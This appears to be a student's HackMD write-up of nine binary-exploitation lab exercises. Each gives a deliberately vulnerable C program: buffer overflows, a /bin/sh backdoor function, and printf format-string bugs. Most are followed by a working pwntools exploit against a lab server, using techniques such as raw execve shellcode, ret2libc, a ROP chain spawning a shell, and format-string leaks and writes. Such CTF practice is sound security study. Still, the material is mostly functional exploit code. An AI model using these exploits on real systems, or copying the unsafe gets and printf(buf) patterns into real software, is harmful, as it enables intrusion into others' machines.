HackMD
0x01-pwntools
from pwn import *
r = remote('140.110.112.217', 10000)
line = r.recvline().decode('UTF-8').strip()
print(line)
data = int(line.split()[-1].rstrip('!'))
print(data)
low, high = 0, data
while True:
guess = (low + high) // 2
r.sendline(str(guess).encode('UTF-8'))
response = r.recvline().decode().strip()
if response == 'Higher!':
low = guess + 1
elif response == 'Lower!':
high = guess - 1
else:
print(response)
break
r.interactive()
r.close()
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
0x02-bof_var
source code:
#include <stdio.h>
//gcc -o bof_var bof_var.c -fno-stack-protector
int main() {
setvbuf(stdout, NULL, _IONBF, 0);
int key = 1234;
puts("Please enter your name:");
char name[16];
read(0, name, 100);
if(key == 0xfaceb00c){
puts("FLAG{FAKE_FLAG}");
}
return 0;
}
exploit:
from pwn import *
r = remote('140.110.112.217', 10001)
r.sendline(b'A' * 28 + p64(0xfaceb00c))
print(r.recvline())
r.interactive()
r.close()
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
0x03-ret2text
source code:
#include <stdio.h>
//gcc -o ret2text ret2text.c -fno-stack-protector -no-pie
void backdoor(){
system("/bin/sh");
}
int main() {
char buffer[8];
gets(buffer);
return 0;
}
exploit:
from pwn import *
r = remote('140.110.112.217', 10002)
r.sendline(b'A' * 16 + p64(0x40115b))
r.interactive()
r.close()
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
0x04-ret2sc
source code:
#include <stdio.h>
#include <sys/mman.h>
// gcc -o ret2sc ret2sc.c -fno-stack-protector -no-pie -z execstack
char message[50];
int main() {
setvbuf(stdout,0,2,0);
void *mem = (void *)0x00404000;
size_t size = 0x00405000 - 0x00404000;
mprotect(mem, size, PROT_READ | PROT_WRITE | PROT_EXEC);
puts("Say something to me?:");
read(0, message, 50);
puts("Show me ret2sc!");
char buffer[100];
gets(buffer);
return 0;
}
exploit:
from pwn import *
r = remote('140.110.112.217', 10003)
shellcode = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
r.recvline()
r.sendline(shellcode)
r.recvline()
r.sendline(b'a'*136 + p64(0x404080))
r.interactive()
r.close()
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
0x05-ret2libc
source code:
#include <stdio.h>
// gcc -o ret2libc ret2libc.c -fno-stack-protector
int main(){
setvbuf( stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
char address[10];
char message[16];
unsigned int addr ;
puts("Can you return to library?");
printf("Address of puts: %p\n", puts);
printf("Address of message: %p\n", message);
printf("Say some thing :\n");
gets(message);
puts("Thanks you ~");
return 0 ;
}
exploit:
from pwn import *
#r=process("./ret2libc")
r = remote('140.110.112.217', 10004)
r.recvline()
puts=int(r.recvline().decode().split(' ')[3],16)
mes=int(r.recvline().decode().split(' ')[3],16)
r.recvline()
puts_offset= 0x80e50
sys_offset=0xebc81
libc_base=puts-puts_offset
system=libc_base+sys_offset
rbp=mes-0x2000
#gdb.attach(r)
r.sendline(b'a'*32+ p64(rbp)+p64(system))
r.interactive()
r.close()
Image Not Showing
Possible Reasons
- The image was uploaded to a note which you don't have access to
- The note which the image was originally uploaded to has been deleted
0x06-rop
source code:
#include <stdio.h>
// gcc -o rop rop.c -static -no-pie -fno-stack-protector
char message[16];
int main()
{
setvbuf( stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
char buf[8];
puts("Leave some message:");
read(0, message, 16);
puts("Show me rop!");
gets(buf);
return 0;
}
exploit:
from pwn import *
#r=process("./rop")
r = remote('140.110.112.217', 10005)
r.recvline()
r.sendline('/bin/sh\x00')
r.recvline()
pop_rdi=0x401f2f
pop_rsi=0x409f9e
pop_rax_rdx_rbx=0x47f2ea
pop_rax=0x419484
syscall=0x401ce4
r.sendline(b'a'*16+p64(pop_rdi)+p64(0x4c72f0)+p64(pop_rsi)+p64(0)+p64(pop_rax_rdx_rbx)+p64(59)+p64(0)+p64(59)+p64(syscall))
r.interactive()
r.close()
0x07-fmt1
source code:
#include <stdio.h>
// gcc -o fmt_1 fmt_1.c
int main()
{
char buf[40];
char flag[16] = "FLAG{FAKE_FLAG!}";
scanf("%s", buf);
printf(buf);
return 0;
}
exploit:
parrot@G:/mnt/d/Users/cheng/Downloads$ nc 140.110.112.217 10006
%6$p,%7$p
0x7730687b47414c46,0x7d63755f6e34635f
parrot@G:/mnt/d/Users/cheng/Downloads$ python3
Type "help", "copyright", "credits" or "license" for more information.
>>> a="w0h{GALF"
>>> print(a[::-1])
FLAG{h0w
>>> b="}cu_n4c_"
>>> print(b[::-1])
_c4n_uc}
>>>
0x08-fmt2
source code:
#include <stdio.h>
// gcc -o fmt_2 fmt_2.c
char flag[16] = "FLAG{FAKE_FLAG!}";
int main()
{
setvbuf( stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
printf("Address of flag: %p\n", flag);
char buf[40];
scanf("%s", buf);
printf(buf);
return 0;
}
exploit:
from pwn import *
#r=process("./fmt_2")
r = remote('140.110.112.217', 10007)
flag=int(r.recvline().decode().split(' ')[3].strip('0x'),16)
s= b'%7$s' + b'd'*4 + p64(flag)
print(flag)
#gdb.attach(r)
r.sendline(s)
r.interactive()
r.close()
0x09-fmt3
source code:
#include <stdio.h>
// gcc -o fmt_3 fmt_3.c
char key = 'a';
int main()
{
setvbuf( stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
printf("Address of key: %p\n", &key);
char buf[40];
scanf("%s", buf);
printf(buf);
if(key == 'b') system("/bin/sh");
return 0;
}
exploit:
from pwn import *
#r=process("./fmt_3")
r = remote('140.110.112.217', 10008)
key=int(r.recvline().decode().split(' ')[3].strip('0x'),16)
s= b'%98c%7$n' + p64(key)
print(key)
#gdb.attach(r)
r.sendline(s)
r.interactive()
r.close()
